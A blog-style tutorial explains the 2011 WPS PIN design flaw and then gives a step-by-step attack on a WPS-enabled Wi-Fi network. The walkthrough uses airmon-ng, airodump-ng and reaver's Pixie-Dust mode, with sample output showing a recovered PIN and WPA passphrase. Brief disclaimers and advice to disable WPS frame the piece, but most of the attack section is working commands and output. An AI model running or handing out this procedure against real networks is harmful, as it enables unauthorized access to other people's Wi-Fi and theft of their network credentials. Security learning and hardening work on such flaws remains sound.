WPS - A key to every network

DISCLAIMER: Don't try using this against your neighbour's Wi-Fi... or bank's... or employer's... You've been warned.

WPS - A key to every network

This article was requested by a certain batman... looks like modern crimes require modern superhero gadgets.

WPS... I believe it stands for "Wi-Fi Protected Setup" which, to be totally honest, is quite ironic. Nowadays, I think a much more fitting name would be "Wi-Fi Penetration System" since I can guarantee you that every network you spot with WPS enabled is hackable in less than 3/4 hours. Interesting? Well, let me show you.

Why WPS is crap - short summary

WPS uses 8-digit PINs to authenticate new devices in the Wi-Fi network. Usually, you would firstly press a big, dumb WPS button on your router, and then select a WPS-connect option on a device you wish to connect. You might think WPS is great as it's simple to use, and yet very secure thanks to a long and random PIN. Right? Right...? NOPE.

First and foremost, even if the PINs were not as flawed as they are, a 8 digit number is not really that hard to brute force through. Sure, it would take longer than a couple of hours, but it's definitely not something that would keep a potential attacker for too long.

Problem is... WPS PINs are not really 8 digit long.

In 2011, a security researcher named  Stefan Viehböck, discovered a flaw in WPS PIN's implementation:

  • the last digit of each PIN is actually a checksum, which can be calculated from the other 7 numbers;
  • the PIN is validated by dividing it into 2 halves: first half leaves 10,000 guesses & 2nd half leaves 1,000 guesses;
  • the two halves of the PIN are often not properly randomized which makes running the tool like Reaver that much easier (more on that later).

Why is it that bad? Well, if the PINs were treated just as a single, long number, the total of brute force guesses you'd have to try before cracking WPS could, in the worst-case scenario, reach 100,000,000. With the PIN only having 7 "real" digits and being split into two halves at the verification stage, in reality, we're only looking at 11,000 guesses... AT MOST.

Let's attack a WPS network

In this tutorial, I'm going to assume a few things just to make it easier:

  1. The attacker (us) knows how to use CLI and uinderstands the basics of *NIX;
  2. The attacker's device has a network card suitable for this attack (either built-in or attached via USB);
  3. The attacker's OS (Kali, Fedora, Mac etc. etc.) is installed on physical hardware, not a VM.

Right, let's move on to the actual tutorial:

1) Install airmon-ng (scanning) and reaver (cracking);

2) Stop services which could interfere with airmon-ng (network-manger etc.); if airmon-ng check complains about "processes which could cause trouble", you can kill -9 <pid> them and try again;

vlku@l33th4xx0r.wpswifi.lab : airmon-ng check
Found 1 process that could cause trouble.
PID Name
100 avahi-daemon

vlku@l33th4xx0r.wpswifi.lab : kill -9 100

vlku@l33th4xx0r.wpswifi.lab : airmon-ng check
No interefering processes found.

3) Once that's all done, you can start the scan:

vlku@l33th4xx0r.wpswifi.lab : ip link
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: wlp2s0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DORMANT group default qlen 1000
    link/ether xx:xx:xx:xx:xx:xx brd ff:ff:ff:ff:ff:ff
vlku@l33th4xx0r.wpswifi.lab : airmon-ng start wlp2s0
No interefering processes found.
PHY    Driver    Driver    Chipset
phy0   wlp2s0    ath9k     Atheros AR9485        

4) With that started, we can proceed to dump the captured packets (CTRL+C to stop):

vlku@l33th4xx0r.wpswifi.lab : airodump-ng wlp2s-0
BSSID             PWR  Beacons  #Data,  #/s  CH  MB  ENC  CIPHER  AUTH  ESSID 

XX:XX:XX:XX:XX:XX -90  7        0       0    4   54e WPA2 CCMP    PSK   WPSWIFI

5) The important bit from that output is the AP's MAC (represented here with XX:XX:XX:XX:XX:XX) and a channel (in this case, 4). We can use it to run reaver and start cracking:

vlku@l33th4xx0r.wpswifi.lab : reaver -i wlp2s0 -b XX:XX:XX:XX:XX:XX -c 4 -K 1 -vv

After a while, reaver should finally return something similar to this (in my experience, it never took more than 2 houirs):]

[Pixie-Dust]  Pixiewps 1.1
[Pixie-Dust]  [*] E-S1 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]  [*] E-S2 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]  [*] WPS pin: 12345678
[Pixie-Dust]  [*] Time taken: 60 s
Running reaver with the correct pin, wait...
Cmd: reaver -i wlp2s0 -b XX:XX:XX:XX:XX:XX -c 4 -K 1 -vv

[Reaver Test] BSSID: XX:XX:XX:XX:XX:XX
[Reaver Test] Channel: 4
[Reaver Test] [*] WPS PIN: '12345678'
[Reaver Test] [*] WPA PSK: 'SECUREASF*CK'
[Reaver Test] [*] AP SSID: 'WPSWIFI'

And that's it! We've got a working PIN. WPS at its best right there.

Disclaimer & summary

This article should only be used for learning purposes. Never hack into network which you don't own or which you weren't asked to penetrate (and for sure don't use my article to learn how to leech your neighbours wi-fi, Mr Batman).

As you can see, WPS is very bad and is in reality just a huge backdoor to your network. Best  practice is to keep it disabled AT ALL TIMES. Don't purchase hardware which requires you to connect to Wi-Fi via WPS.

Related Article